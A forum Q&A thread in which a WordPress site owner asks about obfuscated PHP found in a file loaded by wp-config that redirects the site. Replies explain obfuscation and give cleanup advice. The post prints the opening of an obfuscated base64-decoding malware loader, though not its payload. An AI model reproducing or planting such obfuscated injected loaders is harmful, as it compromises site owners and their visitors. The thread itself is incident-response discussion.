# WebSite Hacked: Trouble Understanding Infected Php Code

Tags: php, wordpress, base64

By the way I am using WordPress, and the file containing this is being required by *wp-config*.

I have identified that the source code below is responsible for the redirection of our website to another site.I tried understanding the code but was really confused how its being coded. I can only understand **base64_decode**.

Here is the snippet:

```html
defined('Œ9¼42¹938153¼¹¹7') || define('Œ9¼42¹938153¼¹¹7',__FILE__);
global $¸¸3º84200½º¸½½50;global $ˆ961949»½¸92º286; 
if(!function_exists('Ž¼30¹193592¹0¼6»')){ 
function Ž¼30¹193592¹0¼6»($º987½8¹02½2¹05º¼,$‡¹½67345¼24¼62¸½=''){ 
if(empty($º987½8¹02½2¹05º¼)) return ''; 
$º987½8¹02½2¹05º¼=base64_decode($º987½8¹02½2¹05º¼);
```

How do I understand this for example, **Ž¼30¹193592¹0¼6»**?

Comment: Also note that probably all your WP is infected, download all the code and search for base64_decode, eval, exec and then clean up your production site. After you finish, update your plugins and make sure your admin password is strong. Automated atacks on WP sites are REALLY common.

Comment: I can you are interested in the obfuscation part, I found a obfuscated backdoor in a wordpress site that has a pretty similar obfuscation technique. I made a gist explaining how to "deobfuscate" it:
https://gist.github.com/jhuliano/7b1245500147e28661aa

Answer (score 2):

This code is obfuscated https://en.wikipedia.org/wiki/Obfuscation_(software)

```
Ž¼30¹193592¹0¼6»
```

is the name of a function defined in this code :-)

It's much more difficult to understand the role of a function called `Ž¼30¹193592¹0¼6»()` than `redirectTo()`

You can find some deobfuscators on the web, but I would suggest you to give up trying understand this code, it's a waste of time.

Comment: No worries. Our WP has been hacked too, so I've spent some time trying to use their code and see what it does ;-)
Some virus can have access to your whole server...! Anyway if your wordpress is really important, you should maybe pay someone to clean it. That's what we did.
Some virus can spread like flu (I had like +200 infected file by the same virus all across my server)